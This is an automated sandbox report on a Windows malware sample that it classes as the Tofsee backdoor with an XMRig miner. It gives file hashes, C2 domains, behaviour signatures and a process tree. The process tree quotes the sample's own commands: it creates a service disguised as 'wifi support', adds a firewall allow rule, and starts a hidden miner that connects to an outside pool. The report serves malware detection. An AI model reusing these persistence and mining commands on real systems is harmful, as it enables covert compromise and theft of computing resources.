Analysis

  • max time kernel
    142s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-06-2022 14:07

General

  • Target

    448738e5f3bd240eea78408b4a700295.exe

  • Size

    263KB

  • MD5

    448738e5f3bd240eea78408b4a700295

  • SHA1

    a5f673e08480399fc8b714ca5384c64f9efa85e4

  • SHA256

    27a1d52df4f2a964e70b9c36b5e08a18589463a44a828ab88cf67c44ba8ec82e

  • SHA512

    7c94cf9f2d004fa20cf3e3f5769e80d50d82fa485bbdf24a73f434ecfa827f1757e67357407df5228aa1437bca6258b82a3e1944549ae644cf3bc60a76bd3a14

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\448738e5f3bd240eea78408b4a700295.exe
    "C:\Users\Admin\AppData\Local\Temp\448738e5f3bd240eea78408b4a700295.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dntabfow\
      2⤵
        PID:960
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vponexkp.exe" C:\Windows\SysWOW64\dntabfow\
        2⤵
          PID:1352
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create dntabfow binPath= "C:\Windows\SysWOW64\dntabfow\vponexkp.exe /d\"C:\Users\Admin\AppData\Local\Temp\448738e5f3bd240eea78408b4a700295.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1176
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description dntabfow "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2008
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start dntabfow
          2⤵
          • Launches sc.exe
          PID:1956
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1156
      • C:\Windows\SysWOW64\dntabfow\vponexkp.exe
        C:\Windows\SysWOW64\dntabfow\vponexkp.exe /d"C:\Users\Admin\AppData\Local\Temp\448738e5f3bd240eea78408b4a700295.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:880

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\vponexkp.exe
        Filesize

        12.8MB

        MD5

        e18ed8a4b536e2f926f9705c9d607cf8

        SHA1

        08ee533616a93d349c8f4927675e756697bda370

        SHA256

        8b14b810d0b0a2ed18e80877d81a90e6fc7a93ae328cd6b9ee9206d0b21654b8

        SHA512

        c7c80d34affbc7f4b30008043ec126653f92e20b0c838b1060c7de56c1b8a6e6b2824ce7958c50a556270e96daad1b98aec011ae151b8b906e4e4faf56737610

      • C:\Windows\SysWOW64\dntabfow\vponexkp.exe
        Filesize

        12.8MB

        MD5

        e18ed8a4b536e2f926f9705c9d607cf8

        SHA1

        08ee533616a93d349c8f4927675e756697bda370

        SHA256

        8b14b810d0b0a2ed18e80877d81a90e6fc7a93ae328cd6b9ee9206d0b21654b8

        SHA512

        c7c80d34affbc7f4b30008043ec126653f92e20b0c838b1060c7de56c1b8a6e6b2824ce7958c50a556270e96daad1b98aec011ae151b8b906e4e4faf56737610

      • memory/880-103-0x00000000001A0000-0x0000000000291000-memory.dmp
        Filesize

        964KB

      • memory/880-108-0x000000000023259C-mapping.dmp
      • memory/880-101-0x00000000001A0000-0x0000000000291000-memory.dmp
        Filesize

        964KB

      • memory/948-56-0x00000000002E8000-0x00000000002F9000-memory.dmp
        Filesize

        68KB

      • memory/948-70-0x0000000000400000-0x0000000002DB9000-memory.dmp
        Filesize

        41.7MB

      • memory/948-59-0x0000000000400000-0x0000000002DB9000-memory.dmp
        Filesize

        41.7MB

      • memory/948-67-0x00000000002E8000-0x00000000002F9000-memory.dmp
        Filesize

        68KB

      • memory/948-57-0x00000000001B0000-0x00000000001C3000-memory.dmp
        Filesize

        76KB

      • memory/948-55-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
        Filesize

        8KB

      • memory/948-54-0x00000000002E8000-0x00000000002F9000-memory.dmp
        Filesize

        68KB

      • memory/960-58-0x0000000000000000-mapping.dmp
      • memory/1156-66-0x0000000000000000-mapping.dmp
      • memory/1176-62-0x0000000000000000-mapping.dmp
      • memory/1352-60-0x0000000000000000-mapping.dmp
      • memory/1556-71-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1556-85-0x00000000000A0000-0x00000000000A6000-memory.dmp
        Filesize

        24KB

      • memory/1556-74-0x0000000000089A6B-mapping.dmp
      • memory/1556-100-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1556-79-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1556-97-0x0000000000270000-0x0000000000277000-memory.dmp
        Filesize

        28KB

      • memory/1556-82-0x0000000001A90000-0x0000000001C9F000-memory.dmp
        Filesize

        2.1MB

      • memory/1556-73-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1556-88-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/1556-91-0x0000000000130000-0x0000000000135000-memory.dmp
        Filesize

        20KB

      • memory/1556-94-0x00000000058F0000-0x0000000005CFB000-memory.dmp
        Filesize

        4.0MB

      • memory/1876-80-0x0000000000400000-0x0000000002DB9000-memory.dmp
        Filesize

        41.7MB

      • memory/1876-75-0x0000000003238000-0x0000000003249000-memory.dmp
        Filesize

        68KB

      • memory/1876-68-0x0000000003238000-0x0000000003249000-memory.dmp
        Filesize

        68KB

      • memory/1956-64-0x0000000000000000-mapping.dmp
      • memory/2008-63-0x0000000000000000-mapping.dmp